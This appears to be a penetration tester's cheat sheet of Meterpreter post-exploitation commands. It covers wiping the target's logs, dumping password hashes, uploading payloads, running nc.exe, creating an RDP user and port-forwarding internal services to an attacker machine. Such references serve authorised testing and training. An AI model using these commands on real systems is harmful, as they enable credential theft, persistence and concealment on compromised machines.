This sheet contains commands often issued via a Meterpreter shell.
- Use the
backgroundcommand to send the shell session into the background. - Use the
sessions -lto list the active sessions - Use
session -i (NUMBER)to interact with a session of ID (NUMBER)
Use clearev to clear the target system's logs.
- Use
download C:\boot.inito download a file from the target - Use the
uploadcommand to upload a payload or file to the target system - Use
pwdandcdto navigation the target's file system - Use
editto open vim with a fie on teh target server - Use
searchto search the file system in agrep -R, orfind, style.
- Use
execute C:\nc.execommand to execute the command on the file system.
- Use
hashdumpto get the NT/LM hashes from the target system. - Use
idletimeto display how long the currently logged in user has been idle at the taregt system. - Use
ipconfigto get Network Information from the target system.
- Use the
migratecommand to migrate the meterpreter shell to another PID. This will inherit the PID's effective User ID.
- Use
run getgui -u (UID) -p (PASSWD)to create a user and enbale RDP on a compromised machine.
The portfwd command can be used to forward a port of on your attacker machine to an iunternal service on the target system. If a service is running on localhost (127.0.0.1) on the taregt system, we can make it publically accessible through our attacker machine with the following command and syntax,
meterpreter> portfwd add -l (PORT ON ATTACKER MACHINE) -p (PORT ON TARGET MACHINE) -r (IP ADDRESS ON TARGET SYSTEM)
For example, if a service is running on an internal port, like MySQL on 3306 running on 127.0.0.1 cannot be accessible via the public IP address. We can think of it as running on the loopback adapter and not eth0, for example.
meterpreter> portfwd add -l 3307 -p 3306 -r 10.10.10.254
The above command will fwd all traffic to my attacker system going to port 3307 to the internal service on the target system to port 3306 on the target's 127.0.0.1 lo.